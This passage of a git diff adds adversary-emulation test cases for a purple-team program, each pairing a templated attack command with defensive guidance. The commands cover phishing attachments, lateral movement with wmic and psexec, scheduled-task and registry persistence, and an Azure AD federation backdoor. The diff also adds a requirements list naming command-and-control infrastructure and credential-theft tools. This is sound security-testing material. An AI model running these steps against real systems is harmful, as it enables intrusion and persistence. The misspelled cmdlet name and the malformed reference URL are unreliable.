--- /dev/null
+++ b/fs-index-2024/techniques/InitialAccess/97f1da56-79a3-4181-a491-8de9f93b05af.yml
@@ -0,0 +1,17 @@
+name: Attachment - Zipped macro
+description: Send a malicious macro-enabled Office document in a ZIP archive to a target user in an email.
+platforms:
+guidance:
+- PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or attachment inside email stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+  id: 97f1da56-79a3-4181-a491-8de9f93b05af
+  tid: T1566.001
+  tactic: TA0001
+  x_vectr_id: 97f1da56-79a3-4181-a491-8de9f93b05af
+  isv: 1
diff --git a/fs-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml b/fs-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
new file mode 100644
index 0000000..daf292b
--- /dev/null
+++ b/fs-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml
@@ -0,0 +1,16 @@
+name: Prompt a user with multiple MFA requests
+description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt.
+platforms:
+guidance:
+block:
+- Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint
+detect:
+- Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour).
+controls:
+- IdP
+metadata:
+  id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+  tid: T1621
+  tactic: TA0006
+  x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7
+  isv: 1
diff --git a/fs-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml b/fs-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
new file mode 100644
index 0000000..1eae23d
--- /dev/null
+++ b/fs-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml
@@ -0,0 +1,17 @@
+name: Attachment - ISO
+description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions.
+platforms:
+guidance:
+- PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }}
+block:
+- Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+  id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+  tid: T1566.001
+  tactic: TA0001
+  x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658
+  isv: 1
diff --git a/fs-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml b/fs-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
new file mode 100644
index 0000000..775b96d
--- /dev/null
+++ b/fs-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml
@@ -0,0 +1,20 @@
+name: Lateral Movement via RDP
+description: Perform an interactive logons to a Windows system via RDP
+platforms:
+- windows
+guidance:
+- CMD> mstsc /v:{{ target }}
+block:
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+  id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+  tid: T1021.001
+  tactic: TA0008
+  x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61
+  isv: 1
diff --git a/fs-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml b/fs-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
new file mode 100644
index 0000000..807596c
--- /dev/null
+++ b/fs-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml
@@ -0,0 +1,23 @@
+name: Lateral Movement via WMI
+description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system
+platforms:
+- windows
+guidance:
+- CMD> wmic /node:"{{ target }}" process call create "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+  id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+  tid: T1021.003
+  tactic: TA0008
+  x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79
+  isv: 1
diff --git a/fs-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml b/fs-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
new file mode 100644
index 0000000..508dc52
--- /dev/null
+++ b/fs-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml
@@ -0,0 +1,24 @@
+name: Lateral Movement via PsExec
+description: Move to another system by creating a service remotely via Sysinternals PsExec
+platforms:
+- windows
+guidance:
+- CMD> psexec -s \{{ target }} {{ command }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Host-based firewalls prevent direct communications over common ports/protocols
+- Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- SIEM
+- Identity Threat Protection
+- Hardening
+metadata:
+  id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+  tid: T1021.002
+  tactic: TA0008
+  x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76
+  isv: 1
diff --git a/fs-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml b/fs-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml
new file mode 100644
index 0000000..c373b4f
--- /dev/null
+++ b/fs-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml
@@ -0,0 +1,20 @@
+name: Remote .exe copy
+description: Copy an .exe payload to a temp folder on the remote target
+platforms:
+guidance:
+- cmd> copy {{ exe }} \\{{ target }}\{{ share }}\{{ path }}
+block:
+- Host-based firewalls prevent direct communications over common ports/protocols
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal
+controls:
+- Endpoint Protection
+- Antivirus
+- SIEM
+metadata:
+  id: b74ff4c5-eebf-466b-af85-341b19c4c748
+  tid: T1570
+  tactic: TA0008
+  x_vectr_id: b74ff4c5-eebf-466b-af85-341b19c4c748
+  isv: 1
diff --git a/fs-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml b/fs-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
new file mode 100644
index 0000000..a58486f
--- /dev/null
+++ b/fs-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml
@@ -0,0 +1,23 @@
+name: Register a new device in Azure AD
+description: Register a new device in Azure AD
+platforms:
+- azuread
+guidance:
+- PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1"
+block:
+- 'Prevent users outside of approved groups from being able to register new devices in the tenant. Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings'
+detect:
+- Detect anomalous device registration events by using Azure audit logs
+controls:
+- SIEM
+- Hardening
+metadata:
+  id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+  tid: T1098.005
+  tactic: TA0003
+  x_tools:
+  - AADInternals
+  x_references:
+  - htpts://aadinternals.nom/post/prt/
+  x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96
+  isv: 1
diff --git a/fs-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml b/fs-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
new file mode 100644
index 0000000..cd00901
--- /dev/null
+++ b/fs-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml
@@ -0,0 +1,20 @@
+name: Persist via new scheduled task
+description: Persist on a system by creating a new scheduled task
+platforms:
+- windows
+guidance:
+- cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+  id: 20a6dace-d801-42f5-b659-6cf91e39d273
+  tid: T1053.005
+  tactic: TA0003
+  x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273
+  isv: 1
diff --git a/fs-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml b/fs-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
new file mode 100644
index 0000000..d43b8c9
--- /dev/null
+++ b/fs-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml
@@ -0,0 +1,20 @@
+name: Persist via new Windows service
+description: Persist on a system by creating a new service
+platforms:
+- windows
+guidance:
+- CMD> sc create {{ service_name }} binPath= "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services.
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+  id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+  tid: T1543.003
+  tactic: TA0003
+  x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737
+  isv: 1
diff --git a/fs-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml b/fs-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
new file mode 100644
index 0000000..a323aaa
--- /dev/null
+++ b/fs-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml
@@ -0,0 +1,20 @@
+name: Persist via Registry Winlogon Shell
+description: Run a payload during user login by setting a Registry Winlogon key
+platforms:
+- windows
+guidance:
+- CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656).
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+  id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+  tid: T1547.004
+  tactic: TA0003
+  x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622
+  isv: 1
diff --git a/fs-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml b/fs-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
new file mode 100644
index 0000000..0a122f8
--- /dev/null
+++ b/fs-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml
@@ -0,0 +1,23 @@
+name: Configure a custom federated domain
+description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant.
+platforms:
+- azuread
+guidance:
+- PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}"
+block:
+- ''
+detect:
+- Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated".
+- https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html
+controls:
+- SIEM
+metadata:
+  id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+  tid: T1484.002
+  tactic: TA0003
+  x_tools:
+  - AADInternals
+  x_references:
+  - https://o365blog.com/post/aadbackdoor/
+  x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1
+  isv: 1
diff --git a/h-index-2024/CHANGELOG.md b/h-index-2024/CHANGELOG.md
new file mode 100644
index 0000000..b5315fa
--- /dev/null
+++ b/h-index-2024/CHANGELOG.md
@@ -0,0 +1,4 @@
+# v1.0 (January 2024)
+
+- Initial release
+
diff --git a/h-index-2024/REQUIREMENTS.md b/h-index-2024/REQUIREMENTS.md
new file mode 100644
index 0000000..131ec9c
--- /dev/null
+++ b/h-index-2024/REQUIREMENTS.md
@@ -0,0 +1,38 @@
+# Infrastructure
+
+- Mail server/relay to send emails
+- Proxy/VPN 
+- Proxy/VPN in non-standard geolocation
+- HTTP/S file hosting server 
+- Command-and-control server(s) with HTTPS and HTTP channels
+- Accounts for : Cloud storage provider (exfil, sharing), remote assistance service (if applicable)
+- Domain(s) and certificate(s) for infrastructure
+
+## Payloads
+
+|#|Test Case|Payload|Notes|
+|---|---|---|---|
+|1|Attachment - ISO|ISO||
+|2|Attachment - Macro|Macro-enabled Office document||
+|3|Link - Zipped DLL via sharing|DLL in zip||
+|4|DLL execution using Rundll32|DLL||
+|5|Sideload a DLL into a legitimate application|DLL|can be shared with #4 as long as exported functions are as expected|
+|6|Load known-abusable kernel driver|Windows driver|refer to notebook for example drivers + hashes|
+|7|Register Security Service Provider (SSP) in LSASS|SSP DLL|refer to notebook for instructions on creating DLL|
+|8|<Exfiltration>|Sensitive data|Use dlptest.com for sample data|
+|9|Macro - Remote Template|Office document that loads remotely-hosted macro-enabled template||
+
+
+# Tools/Scripts
+
+- Remote assistance tool such as TeamViewer, GoTo, or AnyConnect
+- Net Scan : https://www.softperfect.com/products/networkscanner/
+- SharpHound : https://github.com/BloodHoundAD/SharpHound
+- SharpDPAPI : https://github.com/GhostPack/SharpDPAPI
+- Rubeus : https://github.com/GhostPack/Rubeus
+- Mimikatz : https://github.com/gentilkiwi/mimikatz
+- Nanodump : https://github.com/fortra/nanodump
+- ProcDump : https://learn.microsoft.com/en-us/sysinternals/downloads/procdump
+- File encryptor : https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+- AADInternals : https://github.com/Gerenios/AADInternals
+
diff --git a/h-index-2024/h-index-2024-v1.0-layer.json b/h-index-2024/h-index-2024-v1.0-layer.json
new file mode 100644
index 0000000..f8e8020
--- /dev/null
+++ b/h-index-2024/h-index-2024-v1.0-layer.json
@@ -0,0 +1,3168 @@
+{
+    "description": "Health Threat Simulation Index 2024 v1.0",
+    "domain": "enterprise-attack",
+    "layout": {
+        "layout": "flat"
+    },
+    "name": "Health Threat Simulation Index 2024 v1.0",
+    "selectSubtechniquesWithParent": false,
+    "selectTechniquesAcrossTactics": false,
+    "techniques": [
+        {
+            "enabled": false,
+            "techniqueID": "T1001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1001.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1001.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1001.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1002"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1003"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.005"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1003.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1003.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1011.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1013"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1015"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1016"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1016.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1016.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1017"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1018"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1019"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1020"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1020.001"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1021"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1021"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1021"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1021.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1021.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1022"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1023"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1024"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1025"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1026"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.010"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1027.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1028"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1029"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1030"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1031"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1032"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1033"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1034"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1035"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1036.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1037.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1038"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1039"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1040"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1041"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1042"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1043"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1044"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1045"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1046"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1047"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1048"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1048"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1048.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1048.002"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1048.003"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1048.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1049"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1050"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1051"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1052"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1052.001"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1053"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.004"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1053.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1053.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1054"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.011"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.012"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.013"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.014"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1055.015"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1056"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1056.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1056.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1056.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1056.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1057"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1058"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1059.009"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1060"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1061"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1062"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1063"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1064"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1065"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1066"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1067"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1068"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1069.003"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1070"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1070.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.005"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.006"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.007"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.008"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1070.009"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1071"
+        },
+        {
+            "showSubtechniques": true,
+            "techniqueID": "T1071"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1071.001"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1071.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1071.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1071.003"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1071.004"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1072"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1073"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1074"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1074.001"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1074.002"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1075"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1076"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1077"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1078"
+        },
+        {
+            "color": "#7a34eb",
+            "techniqueID": "T1078"
+        },
+        {
+            "enabled": false,
+            "techniqueID": "T1078.001"
+        },
+        {
